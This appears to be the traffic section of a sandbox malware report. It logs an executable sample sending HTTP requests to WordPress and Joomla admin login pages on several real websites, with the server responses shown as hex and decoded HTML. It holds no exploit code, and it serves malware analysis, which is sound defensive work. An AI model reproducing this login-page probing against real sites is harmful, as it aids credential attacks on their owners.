                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1369INData Raw: 62 6f 74 74 6f 6d 3a 34 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 34 70 78 20 73 6f 6c 69 64 3b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65
                                                                                                                                                                                                    Data Ascii: bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1369INData Raw: 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63
                                                                                                                                                                                                    Data Ascii: lock-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:c
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1369INData Raw: 20 23 46 46 46 46 46 46 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 3a 20 23 41 37 31 34 34 43 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 5f 72 3a 20 31 36 37 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 5f 67 3a 20 32 30 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 5f 62 3a 20 37 36 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 63 6f 6c 6f 72 5f 73 77 61 74 63 68 65 73 5f 62 6f 72 64 65 72 5f 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 63 6f 6c 6f 72 5f 73 77 61 74 63
                                                                                                                                                                                                    Data Ascii: #FFFFFF;--yith-wcan-filters_colors_accent: #A7144C;--yith-wcan-filters_colors_accent_r: 167;--yith-wcan-filters_colors_accent_g: 20;--yith-wcan-filters_colors_accent_b: 76;--yith-wcan-color_swatches_border_radius: 100%;--yith-wcan-color_swatc
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC1369INData Raw: 65 20 61 2e 66 61 63 65 62 6f 6f 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 39 35 39 39 45 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 39 35 39 39 45 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 66 61 63 65 62 6f 6f 6b 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 39 35 39 39 45 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 39 35 39 39 45 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 74 77 69 74 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 35 41 46 45 32 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 35 41 46 45 32 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 74 77 69 74 74 65 72 3a 68 6f 76 65 72 7b 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: e a.facebook{background: #39599E; background-color: #39599E;}.yith-wcwl-share a.facebook:hover{background: #39599E; background-color: #39599E;}.yith-wcwl-share a.twitter{background: #45AFE2; background-color: #45AFE2;}.yith-wcwl-share a.twitter:hover{back


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    259192.168.2.462392172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC555INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 73 65 74 2d 63 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20 73
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; s
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC813INData Raw: 32 32 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 49 6e 69 63 69 61 72 20 73 65 73 69 c3 b3 6e 20 26 6c 73 61 71 75 6f 3b 20 53 61 6d 73 6f 6e 20 43 6f 6e 74 72 6f 6c 73 20 50 65 72 c3 ba 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 21
                                                                                                                                                                                                    Data Ascii: 2277<!DOCTYPE html><html lang="es-PE"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Iniciar sesin &lsaquo; Samson Controls Per &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><!
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC8018INData Raw: 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 6f 67 69 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 6f 67 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 53 69 74 65 20 4b 69 74 20 62 79 20 47 6f 6f 67 6c 65 20 31 2e 31 31 34 2e 30 22 20 2f 3e 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 65 66 65 72 72 65 72 27 20 63 6f 6e 74 65 6e 74 3d 27 73 74 72 69 63 74 2d 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 2d 6f 72 69 67 69 6e 27 20 2f 3e 0a 09 09
                                                                                                                                                                                                    Data Ascii: l='stylesheet' id='login-css' href='https://samson.pe/wp-admin/css/login.min.css?ver=6.4.1' type='text/css' media='all' /><meta name="generator" content="Site Kit by Google 1.114.0" /><meta name='referrer' content='strict-origin-when-cross-origin' />
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    260192.168.2.46194692.62.143.504436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC231OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: bunasta.eu
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://www.bunasta.eu/administrator/
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC245INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 6e 61 73 74 61 2e 65 75 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 33 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:40 GMTServer: Apache/2.4.38 (Debian)Location: http://www.bunasta.eu/administrator/index.phpContent-Length: 330Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC330INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 62 75 6e 61 73 74 61 2e 65 75 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.bunasta.eu/administrator/index.php">here</a>.</p><hr><address>Apa


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    261192.168.2.46218045.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC856INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-store, no-cache, must-revalidatecontent-security-policy: upgrade-in
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC7882INData Raw: 31 65 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4c 61 77 20 46 69 72 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: 1ec2<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Law Firm &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javas
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC593INData Raw: 32 34 61 0d 0a 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 77 70 2d 75 74 69 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 33 2e 32 27 20 69 64 3d 27 77 70 2d 75 74 69 6c 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 69 64 3d 27 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 39 38 32 35 38 33 39 63 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72
                                                                                                                                                                                                    Data Ascii: 24aipt' src='https://engel-firm.com/wp-includes/js/wp-util.min.js?ver=6.3.2' id='wp-util-js'></script><script type='text/javascript' id='user-profile-js-extra'>/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"f49825839c"};/* ... */</scr
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    262192.168.2.461944116.202.203.1764436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                    Host: eco-landeck.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC565INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 34 39 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 37 20 41 75 67 20 32 30 30 35 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 13491Connection: closeX-Frame-Options: SAMEORIGINExpires: Wed, 17 Aug 2005 00:00:00 GMTCache-Control: no-store, no-cache,
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC13491INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 64 65 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 48 41 4b 20 48 4c 57 20 4c 61 6e 64 65 63 6b 2c 20 57 65 62 73 69 74 65 20 64 65 72 20 48 61 6e 64 65 6c 73 61 6b 61 64 65 6d 69 65 2c 20 64 65 72 20 4d 65 64 69 61 68 61 6b 20 4c 61 6e 64 65 63 6b 20 75 6e 64
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="de-de" dir="ltr"><head> <meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="HAK HLW Landeck, Website der Handelsakademie, der Mediahak Landeck und


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    263192.168.2.46194354.233.137.1244436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC162OUTGET / HTTP/1.1
                                                                                                                                                                                                    Host: www.rech.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC621INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 70 74 2d 42 52 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 72 69 67 69 6e 44 69 72 65 63 74 3d 74 72 75 65 3b 20 4d 61 78 2d 41 67 65 3d 36 30
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html;charset=UTF-8Transfer-Encoding: chunkedConnection: closeContent-Language: pt-BRContent-Security-Policy: frame-ancestors 'self'Set-Cookie: originDirect=true; Max-Age=60
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC15763INData Raw: 37 64 38 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 20 5d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70
                                                                                                                                                                                                    Data Ascii: 7d88<!DOCTYPE html>...[if lt IE 7 ]> <html lang="pt" class="no-js ie6"> <![endif]-->...[if IE 7 ]> <html lang="pt" class="no-js ie7"> <![endif]-->...[if IE 8 ]> <html lang="pt" class="no-js ie8"> <![endif]-->...[if IE 9 ]> <html lang="p
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16381INData Raw: 6f 6e 63 6c 69 63 6b 3d 22 73 65 6e 64 4b 69 6e 65 73 69 73 44 61 74 61 41 6a 61 78 28 7b 61 63 74 69 6f 6e 49 44 3a 20 27 63 6c 69 63 6b 27 2c 61 63 74 69 6f 6e 44 61 74 61 3a 60 61 64 65 73 69 76 6f 73 2d 64 65 63 61 6c 71 75 65 73 20 2d 20 63 61 74 65 67 6f 72 79 32 60 7d 29 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 41 64 65 73 69 76 6f 73 20 26 61 6d 70 3b 20 44 65 63 61 6c 71 75 65 73 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6c 69 6e 6b 22 0a 09 09 09
                                                                                                                                                                                                    Data Ascii: onclick="sendKinesisDataAjax({actionID: 'click',actionData:`adesivos-decalques - category2`})">Adesivos &amp; Decalques</a><a class="sub-menu-item-link"
